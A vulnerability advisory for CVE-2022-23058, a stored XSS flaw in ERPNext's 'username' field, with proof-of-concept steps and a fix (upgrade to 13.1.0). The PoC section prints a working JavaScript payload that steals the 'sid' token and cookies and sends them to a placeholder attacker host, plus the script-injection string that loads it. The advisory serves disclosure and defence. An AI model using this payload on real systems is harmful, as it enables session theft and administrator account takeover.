Headline
CVE-2022-23058: Mend Vulnerability Database
ERPNext in versions v12.0.9-v13.0.3 are affected by a stored XSS vulnerability that allows low privileged users to store malicious scripts in the ‘username’ field in ‘my settings’ which can lead to full account takeover.
Overview
In ERPNext, versions v12.0.9-v13.0.3 are vulnerable to Stored Cross-Site-Scripting (XSS), due to user input not being validated properly. A low privileged attacker could inject arbitrary code into input fields when editing his profile.
Details
ERPNext is affected by a stored XSS vulnerability that allows low privileged users to store malicious scripts in the ‘username’ field in ‘my settings’.
These scripts are executed in a victim’s browser when they open the page containing the vulnerable field. The victim who inadvertently triggers the attack, can be a highly privileged user, such as an administrator, so the injected scripts can extract the sid token and cookies, which can lead to full Account takeover and Privilege escalation. Moreover, there is an availability issue, once the JavaScript payload is stored on the server, the victim would not be able to browse through the platform.
PoC Details
1. Login to the application with low privileged user
2. Go to the settings option in the navigation bar and select my Settings.
3. Provide the malicious script in the ‘username’ field and click save. (from the PoC code)
4. Create a file named ‘test1.js’ and run an HTTP server (like python simple http server)
the content of the ‘test1.js’ file:
var re = /\\"sid\\":\\s\\"[0-9a-zA-Z]+\\"/gm;
var te = /[0-9a-zA-Z]+/gm;
var getSID = (document.documentElement.innerHTML).match(re);
getSID = getSID[0].split(‘:’);
getSID = getSID[1].match(te);
console.log(getSID);
url = 'http://[attacker-ip]:[attacker-port]/?sid=’+getSID;
var script = document.createElement(‘script’);
script.src = url+"&details= " + document.cookie;
document.getElementsByTagName(‘head’)[0].appendChild(script);
5. open a tab in Incognito and go to the ERPNext server and login with a high privileged user , it will be redirected to the malicious page.
6. After a successful login, the ‘sid’ parameter will be sent to the Attacker which can then use it to login as Administrator
PoC Code
<!--</SCRIPT><script src=http://<attacker-ip>:<port>/test1.js></script>-->
Affected Environments
ERPNext versions v12.0.9 through v13.0.3
Prevention
Upgrade to ERPNext version 13.1.0